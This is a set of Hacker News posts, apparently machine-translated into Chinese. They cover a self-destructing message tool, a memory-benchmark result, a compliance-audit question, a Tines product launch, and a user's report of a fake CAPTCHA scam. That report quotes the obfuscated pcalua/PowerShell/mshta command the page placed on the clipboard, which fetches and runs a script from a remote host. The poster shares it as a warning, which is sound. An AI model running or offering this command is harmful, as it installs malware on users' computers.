2作者: minpym12 天前
大家好!这是我第一次在 HN 上发帖,我刚接触这个领域不久。我叫 Min,来自曼谷。 起初,我只是想为自己制作一个“死亡开关”,纯属个人用途和娱乐。然后,我想到像间谍电影里那样信息自毁的功能。之后,我尝试想出一个比 Privnote 或 Bitwarden 更好的版本,具备自毁功能,以及某种程度的审查或阻止下载的能力。不知怎么的,就有了这个产品。:O Flashpaper 用于发送任何“阅后即焚”的信息(带有像《碟中谍》电影一样的倒计时器!或者在 24 小时内未打开则失效)。加密在浏览器中进行,由于密钥保留在链接的 # 之后,服务器永远不会看到密钥(适用于 Web 端的零知识证明)。而且,因为我是新手,我不想连接数据库,因为我没钱,而且我希望事情保持轻量和简单。所以,Flashpaper 将信息保存在内存中,没有数据库。 对于 AI Agent 端,Flashpaper 提供了一个 REST API 和一个 MCP 服务器,以便 Agent 可以轻松地以“一次性领取”的风格创建秘密链接。第二次领取将返回 404,这意味着已经被别人领取了。然而,对于 Agent API 流程,服务器在加密之前会短暂看到明文,所以这个流程不像 Web 流程那样是零知识的。 总的来说,我认为它在 Web 端表现相当不错,但对于 Agent API 的使用,我不确定安全性是否足够。所有限制都在 SECURITY.md 文件中列出。欢迎大家提出反馈。 我将其开源,采用 MIT 许可证,并对企业用户实行“荣誉许可”政策,例如自托管 Docker。 这是我的仓库:[https://github.com/mmmpym/flashpaper](https://github.com/mmmpym/flashpaper) 你也可以在这里试用:[https://flashpaper.app](https://flashpaper.app) 再次强调!请随时告诉我我遗漏了什么。 Min
2作者: johnnymakes12 天前
大家好,我是 Exabase 的创始人 Johnny。我们刚刚在 BEAM 上取得了迄今为止最高的报告分数,BEAM 是最难的人工智能记忆基准测试,覆盖了高达 1000 万 token 的所有规模。我们还使用 Gemini 3 Flash 进行了评估,而之前所有领先者都依赖于更大规模的模型(Gemini 3 Pro)。 在 1000 万 token 的规模下,其大小远远超过了任何模型的上下文窗口,因此上下文填充不是一个选项(而且即使是这样,在不降级的情况下,也只能有效利用大约一半的大窗口)。要获得好成绩的唯一方法是拥有真正起作用的检索能力。 我们的系统 (M-1) 在 100K 规模下得分 76.9%,在 1M 规模下得分 75.0%,在 10M 规模下得分 68.0%。之前的领先者是 Hindsight(分别为 73.4%、73.9%、64.1%)和 Honcho(分别为 63.0%、63.1%、40.6%),它们都使用了 Gemini 3 Pro,而我们使用的是 Flash。 我们发现,随着规模的增大,竞争差距也在扩大:在 100K 规模下领先 Hindsight 3.5 个百分点,在 10M 规模下领先 3.9 个百分点。与 Honcho 的差距从 13.9 个百分点扩大到 27.4 个百分点。随着语料库的增大,它更能区分有效的检索能力与蛮力/模型能力。 M-1 在每次查询时消耗的 token 量也比次优系统少约 20%。 关于 BEAM 基准测试: BEAM 测试了十种记忆能力,包括其他基准测试未涵盖的一些能力:矛盾解决、事件排序和指令遵循。1000 万 token 的规模大致相当于一年内与 LLM 进行的长时间日常对话。 当然,我们的系统离完美还有很长的路要走,在某些类别(偏好遵循、指令遵循、摘要、弃权)方面表现出色,即使在 1000 万 token 的规模下,这些类别也一直保持在 90% 以上。 在其他类别中,我们的系统也显示出弱点:例如,多会话推理:在 100K 规模下为 44.7%,在 10M 规模下下降到 9.6%。尽管这一挑战似乎是这个规模下所有记忆系统的普遍问题,而非 M-1 特有。我们将继续努力解决这个问题。 方法论: 我们分叉了 Hindsight 的开源基准测试脚本,替换了检索层,并使用了 runner 的提示结构,并进行了少量调整以用于生产环境。完整的 metodology、所有三个规模的结果 JSON 以及提示生成器都链接在论文中(论文链接如下)。 结合我们的 LongMemEval 结果(96.4%),M-1 现在是唯一一个在从 11.5 万到 1000 万 token 的所有规模下,在两个主要记忆基准测试中都保持 SOTA 的系统。 研究论文:https://exabase.io/research/exabase-achieves-state-of-the-art-on-beam-benchmark 很乐意讨论架构、基准测试、规模挑战等。
2作者: Luxter12 天前
像Vanta、Drata等合规性软件只能读取第三方API(如AWS、Github、Okta等),但无法自动审计实际使用这些API的应用程序,例如在特定时间点谁拥有应用程序的管理员访问权限。 我是一名在波兰的工程师,没有合规背景。因此,如果您过去曾为您的应用程序进行过审计(SOC 2 / ISO 27001 / HIPAA / PCI 等): 1. 您生成了什么(截图?SQL查询?CSV?) 2. 您公司里是谁做的?花了多长时间?这是一个经常性的任务吗? 3. 您是否在内部构建了任何工具来完成这项工作?您还在维护它吗? 如果您使用了某个工具来完成这项工作,我将非常感谢您告诉我具体是哪个工具。
14作者: Jgoauh12 天前
大家好, 今天早上我开始轮班时,想着先浏览一些新闻博客/网站来开始新的一天。当我访问 Crooked Timber 时,我看到了一个验证码页面,看起来像传统的谷歌验证码。 我点击了它,加载图标旋转了一下,右侧弹出一个框,显示着蓝底白字的传统“请验证您是人类”的标题。 它显示了 2 个“手动验证步骤”: 1. 按 Win + R 2. 按 Ctrl + V 然后按运行 起初我以为这是一种新的验证方式,用来检查浏览器是否连接了物理键盘。但我立刻意识到这是企图让我运行一段脚本。 我打开了一个新的标签页,令我惊讶的是,剪贴板里竟然有新内容: “pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/^/fine-work-team.com/^6272' -Wi Hi"” 我将这段内容提交给了我工作单位提供的一个大型语言模型,它告诉我绝对不要运行它(我本来也没打算运行),并解释说该命令会从该 URL 下载并运行一个脚本。 我该如何保护自己免受这类诈骗/黑客攻击?我一直认为自己“有准备”,但这次我还是感到惊讶。 您以前遇到过这种情况吗?您是如何保护自己的?
17作者: retsol12 天前
各位 HN 的朋友们!我是 Tines 的 Yannick,非常激动地向大家宣布我们今天推出的新产品。<p>Tines 3B 是我们为构建 AI 代理、应用程序和自动化流程的团队打造的新产品。我们的出发点是,人们已经在这样做,无论 IT 或安全部门是否知情。<p>财务、市场营销等部门正在使用 Claude Code 或 Codex 构建仪表板。这些行为并非恶意,人们只是在完成被赋予的任务。问题在于,这些工作缺乏一个安全运行的便捷途径:它们最终会运行在笔记本电脑或个人账户上,凭证直接粘贴在代码中,而且没有人能够看到它的存在。<p>Tines 3B 就是这些工作运行的地方:每个人仍然可以以同样的方式进行构建,但它将在 IT 和安全部门能够实际看到和控制的环境中执行。<p>它采用代码优先的方式,您描述您想要的功能,您的 LLM 将编写实现代码,并通过代理处理隔离执行和凭证,而不是将凭证嵌入代码中。<p>我们的另一款产品在过去八年中一直在安全和 IT 团队最敏感的系统中运行。这只是针对一类新的构建者,解决了相同的基础问题(谁可以访问什么,以及谁可以看到它)。<p>我们的 Explorer 版本永久免费,完全自助服务:<a href="https:&#x2F;&#x2F;login.tines.com&#x2F;saml_idp&#x2F;signup" rel="nofollow">https:&#x2F;&#x2F;login.tines.com&#x2F;saml_idp&#x2F;signup</a>